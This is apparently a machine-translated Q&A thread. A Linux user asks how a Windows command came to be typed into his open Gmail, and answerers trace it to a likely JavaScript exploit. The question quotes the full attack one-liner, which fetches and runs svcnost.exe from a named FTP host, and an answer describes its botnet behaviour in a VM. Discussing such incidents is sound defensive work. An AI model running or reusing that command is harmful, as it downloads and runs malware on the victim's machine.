web-dev-qa-db-ja.com

Linuxコンピューターがハッキングされたかどうかを識別する方法

自宅のPCは通常オンになっていますが、モニターはオフになっています。今晩私は仕事から家に帰り、ハッキングの試みのように見えるものを見つけました:私のブラウザーでは、私のGmailは開いていました(それは私でした)が、TOフィールドに次のように構成モードでした:

md/c echo open cCTeamFtp.yi.org 21 >> ik&echo user ccteam10 765824 >> ik&echo binary >> ik&echo get svcnost.exe >> ik&echo bye >> ik&ftp -n -v -s:ik&del ik &svcnost.exe&exit echo所有しました

これはWindowsのコマンドラインコードのように見え、コードのmdの開始とGmailが作成モードであるという事実を組み合わせれば、誰かがcmdコマンドを実行しようとしたことがわかります。私はこのPCで実際にWindowsを実行していなかったのは幸運だったと思いますが、他にも実行できるものがあります。このようなことが私に起こったのはこれが初めてです。私はLinuxの第一人者ではなく、Firefox以外に他のプログラムを実行していませんでした。

私はこれを書かなかったし、他の誰も私のコンピュータに物理的にいたことはないと確信しています。また、最近、Googleのパスワード(および他のすべてのパスワード)をvMA8ogd7bvのようなものに変更したので、誰かが私のGoogleアカウントをハッキングしたとは思わない。

何が起こったのですか?何年もマルウェアを実行しているおばあちゃんの古いWindowsマシンではなく、最近の新しいUbuntuではない場合、誰かが私のコンピューターにキーストロークを配置するにはどうすればよいですか?インストール?

更新:
いくつかのポイントと質問に対応させてください:

  • 私はオーストリアの田舎にいます。私のWLANルーターは WPA2 / [〜#〜] psk [〜#〜] と、辞書にない中程度の強力なパスワードを実行しています。力ずくで、ここから50メートル未満でなければなりません。ハッキングされた可能性は低いです。
  • 私はUSB有線キーボードを使用しているので、誰かが範囲内に侵入してハッキングする可能性はほとんどありません。
  • 当時はコンピューターを使用していませんでした。私が仕事をしている間、それはただ家でアイドリングしていました。モニターにマウントされたネットトップPCなので、めったに電源を切らない。
  • マシンは2か月前のもので、Ubuntuのみを実行しており、私は奇妙なソフトウェアを使用したり、奇妙なサイトにアクセスしたりしていません。主にStack Exchange、Gmail、新聞です。ノーゲーム。 Ubuntuは常に最新の状態に保たれています。
  • 実行中のVNCサービスについては知りません。確かにインストールも有効化もしていません。他のサーバーも起動していません。デフォルトでUbuntuで実行されているものがあるかどうかわかりません。
  • GmailのアカウントアクティビティのすべてのIPアドレスを知っています。 Googleが玄関口ではなかったと私はかなり確信している。
  • Log File Viewerを見つけましたが、何を探すべきかわかりません。助けて?

インターネットからだれでも私のマシンでキーストロークを生成するにはどうすればよいですか? 私はLinuxオタクではありません。20年以上Windowsに夢中になっていて、うんざりしている父親です。そして、18年間以上オンラインになっている間、私は個人的にハッキングの試みを見たことがないので、これは私にとって初めてです。

linuxsecurity
128
Torben Gundtofte-Bruun

心配することはないと思います。 ドライブバイダウンロード を実行しようとしたJavaScript攻撃である可能性が高いです。この問題の発生が懸念される場合は、 NoScript および AdBlock Plus Firefoxアドオンを使用してください。

信頼できるサイトにアクセスしても、悪意のある第三者の広告主からのJavaScriptコードを実行するため、安全ではありません。

私はそれをつかんでVMで実行しました。それはmircをインストールし、これはステータスログです... http://Pastebin.com/Mn85akMk

これは、mIRCをダウンロードしてボットネットに参加させ、スパムボットに変えようとする自動化された攻撃です...私のVMに参加して、異なるリモートアドレスの1つはautoemail-119.west320.com

Windows 7で実行する場合、UACプロンプトを受け入れ、ファイアウォール経由でのアクセスを許可する必要がありました。

他のフォーラムでこの正確なコマンドのレポートがたくさんあるようで、誰かがトレントファイルがダウンロードが完了したときにそれを実行しようとしたとさえ言っています...それがどのように可能かはわかりませんが。

私自身はこれを使用していませんが、現在のネットワーク接続を表示して、通常とは異なる何かに接続しているかどうかを確認できるはずです: http://netactview.sourceforge.net/download .html

66
Riguez

私は @ jb48394 に同意します。これは、最近のすべてのように、おそらくJavaScriptの悪用であると考えています。

cmdウィンドウ@ torbengbのコメントを参照して、ダウンロードするだけでなく、悪意のあるコマンドを実行しようとしたという事実バックグラウンドで慎重にトロイの木馬は、それを示唆していますFirefoxのいくつかの脆弱性を悪用して、キーストロークを入力できるようにしますが、コードを実行することはできません。

これは、このエクスプロイトが明確にWindows専用に書かれており、Linuxでも機能する理由も説明します。FirefoxはすべてのOSで同じようにJavaScriptを実行します =(少なくとも、それは:)を試みます)。それがWindows向けのバッファオーバーフローまたは同様のエクスプロイトによって引き起こされた場合、プログラムがクラッシュしただけです。

JavaScriptコードがどこから来たのか-おそらく悪意のあるGoogle広告(広告は1日中Gmailで循環します)。それは しないbethefirsttime です。

42
BlueRaja - Danny Pflughoeft

別のLinuxマシンで 同様の攻撃 を見つけました。これは、WindowsのFTPコマンドのようなものです。

12
Shekhar

これはすべての質問に答えるものではありませんが、ログファイルでログオン試行の失敗を探します。

ログに失敗した試行が5回を超えると、誰かがrootをクラックしようとしました。コンピュータから離れているときにrootへのログオンに成功した場合は、パスワードをすぐに変更してください。今すぐです!できれば英数字で、長さは約10文字です。

受け取ったメッセージ(echoコマンド)を使用すると、これは実際には未熟な script kiddie のように聞こえます。もし彼が何をしているのか知っている本当のハッカーだったら、おそらくあなたはまだそれを知らないでしょう。

5
Nate Koppenhaver